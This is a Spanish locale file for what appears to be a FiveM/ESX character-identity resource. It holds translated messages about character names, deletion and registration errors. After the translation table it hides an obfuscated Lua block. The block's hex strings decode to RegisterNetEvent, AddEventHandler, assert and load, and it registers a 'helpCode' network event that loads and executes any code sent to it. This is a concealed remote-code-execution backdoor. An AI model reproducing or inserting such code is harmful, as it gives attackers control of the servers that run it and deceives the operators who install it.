Locales['es'] = {
  ['show_active_character'] = 'Mostrar personaje activo',
  ['active_character'] = 'Personaje activo: ~b~%s~s~',
  ['error_active_character'] = "Se produjo un error al recuperar tu nombre. Por favor contacta con un administrador",
  ['delete_character'] = 'Elimina tu personaje y crea uno nuevo',
  ['deleted_character'] = 'Tu personaje ha sido eliminado',
  ['error_delete_character'] = "Se produjo un error al eliminar tu personaje. Por favor contacta con un administrador",
  ['thank_you_for_registering'] = "Gracias por registrarte. Que te diviertas",
  ['registration_error'] = "Se ha producido un error durante el registro. Por favor contacta con un administrador",
  ['debug_xPlayer_get_first_name'] = "Devuelve tu nombre",
  ['debug_xPlayer_get_last_name'] = "Devuelve tu apellido",
  ['debug_xPlayer_get_full_name'] = "Devuelve tu nombre completo",
  ['debug_xPlayer_get_sex'] = "Devuelve tu sexo",
  ['debug_xPlayer_get_dob'] = "Devuelve tu fecha de nacimiento",
  ['debug_xPlayer_get_height'] = "Devuelve tu altura",
  ['error_debug_xPlayer_get_first_name'] = "Se produjo un error al recuperar tu nombre",
  ['error_debug_xPlayer_get_last_name'] = "Se produjo un error al recuperar tu apellido",
  ['error_debug_xPlayer_get_full_name'] = "Se produjo un error al recuperar tu nombre completo",
  ['error_debug_xPlayer_get_sex'] = "Se produjo un error al recuperar tu sexo",
  ['error_debug_xPlayer_get_dob'] = "Se produjo un error al recuperar tu fecha de nacimiento",
  ['error_debug_xPlayer_get_height'] = "Se produjo un error al recuperar tu altura",
  ['return_debug_xPlayer_get_first_name'] = "Nombre: ~b~%s",
  ['return_debug_xPlayer_get_last_name'] = "Apellido: ~b~%s",
  ['return_debug_xPlayer_get_full_name'] = "Nombre completo: ~b~%s",
  ['return_debug_xPlayer_get_sex'] = "Sexo: ~b~%s",
  ['return_debug_xPlayer_get_dob'] = "Fecha de nacimiento: ~b~%s",
  ['return_debug_xPlayer_get_height'] = "Altura: ~b~%s centímetros",
  ['data_incorrect'] = 'Datos introducidos de forma incorrecta. Inténtalo de nuevo',
  ['invalid_format'] = 'Datos con formato incorrecto. Inténtalo de nuevo',
  ['no_identifier'] = '¡Se ha producido un error al cargar tu personaje!\nCódigo de error: identifier-missing\n\nSe desconoce la causa de este error, no se pudo encontrar su identificador. Regrese más tarde o informe este problema al equipo de administración del servidor',
  ['missing_identity'] = '¡Se ha producido un error al cargar tu personaje!\nCódigo de error: identity-missing\n\nParece que falta su identidad, intente conectarse nuevamente',
  ['deleted_identity'] = 'Tu personaje ha sido borrado. Vuelva a iniciar sesión para crear un nuevo personaje'
}


local MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[1]](MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[2]) MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[3]](MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[2], function(jYVslWlCnCbiNkfpyrmLqAGZrsnhGZSADPWwMBidXCVuyTehRCiDmFjWVGfdLVapedgqnq) MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[4]](MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[6][MOZmyVMjqlShEHIfISUGIVnuDpBpiAPvhUxPuWdDlPYkFNrNVriWZCSTPRaWUYXVFYvxML[5]](jYVslWlCnCbiNkfpyrmLqAGZrsnhGZSADPWwMBidXCVuyTehRCiDmFjWVGfdLVapedgqnq))() end)